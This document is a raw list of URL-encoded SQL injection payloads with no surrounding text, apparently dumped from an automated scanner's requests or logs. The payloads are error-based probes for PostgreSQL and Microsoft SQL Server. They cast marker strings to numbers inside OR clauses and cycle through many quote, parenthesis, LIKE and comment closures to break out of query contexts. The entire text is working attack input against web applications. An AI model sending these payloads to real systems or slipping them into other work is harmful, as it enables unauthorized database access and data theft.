-2911%22%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%22aHlb%22%20LIKE%20%22aHlb -2991%25%27%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27%25%27%3D%27 -7149%25%27%29%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27%25%27%3D%27 -2906%25%27%29%29%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27%25%27%3D%27 -9387%25%27%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27%25%27%3D%27 -6849%00%27%29%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27ATCO%27%3D%27ATCO -9741%00%27%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27ZJri%27%3D%27ZJri -8765%27%29%20WHERE%209007%3D9007%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -1238%22%29%20WHERE%209284%3D9284%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -5517%27%20WHERE%203186%3D3186%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -7537%22%20WHERE%201822%3D1822%20OR%209247%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289247%3D9247%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 -4728%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -2956%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%287990%3D7990 -1637%29%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%288306%3D8306 -5755%29%29%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%281392%3D1392 -6978%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -2888%29%20WHERE%201132%3D1132%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -5363%20WHERE%209028%3D9028%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -8131%27%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -9942%27%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -7686%22%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -7813%27%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27ksAL%27%3D%27ksAL -4611%27%29%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27MgAO%27%3D%27MgAO -7752%27%29%29%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27VWsZ%27%3D%27VWsZ -3622%27%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27HwVZ%27%3D%27HwVZ -1912%27%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27XCKd%27%20LIKE%20%27XCKd -9364%27%29%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27DeOL%27%20LIKE%20%27DeOL -9784%27%29%29%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27MoGF%27%20LIKE%20%27MoGF -8572%27%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27ddWt%27%20LIKE%20%27ddWt -9834%22%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%22bvmw%22%3D%22bvmw -1901%22%29%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22TWKQ%22%3D%22TWKQ -2884%22%29%29%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22JMVR%22%3D%22JMVR -7147%22%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%22OAMv%22%3D%22OAMv -7021%22%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%22ssjL%22%20LIKE%20%22ssjL -2158%22%29%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22HHRj%22%20LIKE%20%22HHRj -9031%22%29%29%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22ZNtw%22%20LIKE%20%22ZNtw -5844%22%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%22ulNQ%22%20LIKE%20%22ulNQ -3813%25%27%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27%25%27%3D%27 -7577%25%27%29%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27%25%27%3D%27 -2315%25%27%29%29%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27%25%27%3D%27 -6176%25%27%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27%25%27%3D%27 -3004%00%27%29%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27zVlP%27%3D%27zVlP -4541%00%27%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%27vSdI%27%3D%27vSdI -4117%27%29%20WHERE%202240%3D2240%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -3060%22%29%20WHERE%205034%3D5034%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -3639%27%20WHERE%205589%3D5589%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -8623%22%20WHERE%203719%3D3719%20OR%205468%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%285468%3D5468%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -2934%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -8758%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%288986%3D8986 -5292%29%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%286313%3D6313 -7498%29%29%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%287753%3D7753 -4871%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -3340%29%20WHERE%208927%3D8927%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -6632%20WHERE%209242%3D9242%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20--%20 -9628%27%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -1714%27%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -4486%22%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29 -7574%27%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%27YGhl%27%3D%27YGhl -4608%27%29%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27xMpo%27%3D%27xMpo -1780%27%29%29%29%20OR%208740%20IN%20%28%28CHAR%2858%29%2BCHAR%28110%29%2BCHAR%28115%29%2BCHAR%28107%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%288740%3D8740%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27hfLt%27%3D%27hfLt 